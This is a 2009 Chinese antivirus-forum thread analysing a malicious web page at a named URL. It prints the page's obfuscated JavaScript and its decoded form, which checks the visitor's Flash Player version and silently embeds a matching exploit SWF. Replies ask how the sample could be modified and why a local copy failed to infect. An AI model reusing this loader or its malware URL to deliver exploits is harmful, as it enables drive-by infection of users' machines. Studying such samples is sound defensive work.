瑞星卡卡安全论坛技术交流区恶意网站交流 大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

1   1  /  1  页   跳转

[求助] 大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

http://j7c7c.cn/x38/y1.htm 大家帮我看看这个网战上的网马 本人觉得好象没有那么简单 但是有不知道错在那里
源码是这个<script type="text/javascript" src="swfobject.js"></script>
<div id="avstYT">111</div><div id="safeYT">222</div>
<script language =javascript>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('2.3("<s w=\\"v\\/r\\">");2.3("7 6=t.q.m();");2.3("5(6[\\\'l\\\'+\\\'n\\\']==9){");2.3("    2.i([url=]\\\'k\\\').j=\\"\\";");2.3[/url]("    5(6[\\\'8\\\']==o){");2.3("        7 4=c b([url=file://\\]\\".\\/p.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url]("        4.d([url=file://\\]\\"g\\")");2.3[/url]("    }h 5(6[\\\'8\\\']==u){");2.3("        7 4=c b([url=file://\\]\\".\\/y.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url]("        4.d([url=file://\\]\\"g\\")");2.3[/url]("    }h 5(6[\\\'8\\\']==D){");2.3("        7 4=c b([url=file://\\]\\".\\/F.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url]("        4.d([url=file://\\]\\"g\\")");2.3[/url]("    }h 5(6[\\\'8\\\']==E){");2.3("        7 4=c b([url=file://\\]\\".\\/B.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url]("        4.d([url=file://\\]\\"g\\")");2.3[/url]("    }h 5(6[\\\'8\\\']==C){");2.3("        7 4=c b([url=file://\\]\\".\\/x.e\\",\\"a\\",\\"0.1\\",\\"0.1\\",\\"9\\",\\"#f\\");");2.3[/url]("        4.d([url=file://\\]\\"g\\")");2.3[/url]("    }h 5(6[\\\'8\\\']>=A){");2.3("        5(2.i){");2.3("            2.i([url=]\\\'k\\\').j=\\"\\"");2.3[/url]("        }");2.3("    }");2.3("}");2.3("<[url=]\\/z>")',42,42,'||document|writeln|so|if|version|var|rev||mymovie|SWFObject|new|write|swf|000000|avstYT|else|getElementById|innerHTML|safeYT|ma|getPlayerVersion|jor|115|x1|SWFObjectUtil|javascript|script|deconcept|47|text|type|x5|x3|ScripT|124|x2|28|45|64|x4'.split('|'),0[/url],{}))
我用eval解密以后出现的代码是这个
document.writeln("<script type=\"text\/javascript\">");document.writeln("var version=deconcept.SWFObjectUtil.getPlayerVersion();");document.writeln("if(version[\'ma\'+\'jor\']==9){");document.writeln("    document.getElementById(\'safeYT\').innerHTML=\"\";");document.writeln("    if(version[\'rev\']==115){");document.writeln("        var so=new SWFObject(\".\/x1.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln("        so.write(\"avstYT\")");document.writeln("    }else if(version[\'rev\']==47){");document.writeln("        var so=new SWFObject(\".\/x3.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln("        so.write(\"avstYT\")");document.writeln("    }else if(version[\'rev\']==45){");document.writeln("        var so=new SWFObject(\".\/x4.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln("        so.write(\"avstYT\")");document.writeln("    }else if(version[\'rev\']==64){");document.writeln("        var so=new SWFObject(\".\/x2.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln("        so.write(\"avstYT\")");document.writeln("    }else if(version[\'rev\']==28){");document.writeln("        var so=new SWFObject(\".\/x5.swf\",\"mymovie\",\"0.1\",\"0.1\",\"9\",\"#000000\");");document.writeln("        so.write(\"avstYT\")");document.writeln("    }else if(version[\'rev\']>=124){");document.writeln("        if(document.getElementById){");document.writeln("            document.getElementById(\'safeYT\').innerHTML=\"\"");document.writeln("        }");document.writeln("    }");document.writeln("}");document.writeln("<\/ScripT>")
我没有找到网马地址 不知道那位大狭能帮助一下

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
最后编辑networkedition 最后编辑于 2009-08-20 12:44:59
分享到:
gototop
 

回复:大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

那这个SWF文件怎么打开呢
gototop
 

回复:大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

哈哈 您可真厉害 那有没有办法 把它修改呢
gototop
 

回复:大家帮我看看这个http://j7c7c.cn/x38/y1.htm上的网马

我很大家对我的帮助 但是我还是有一个问题 我知道这是个FLASH网马 所以我把他的文件都下载了下来 其中包括一个htm文件和12个swf文件 我在本地假设WEB服务器 按理说只要我运行我的地址http://127.0.0.1:88/1.htm这个地址 我就会中了它的木马 但是很可惜我们有中而且一点反映也没有 我很奇怪为什么我访问http://j7c7c.cn/x38/y1.htm会中木马 而访问http://127.0.0.1:88/1.htm却一点事情也没有呢 帖子里的高手能帮我解答一下吗
gototop
 
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT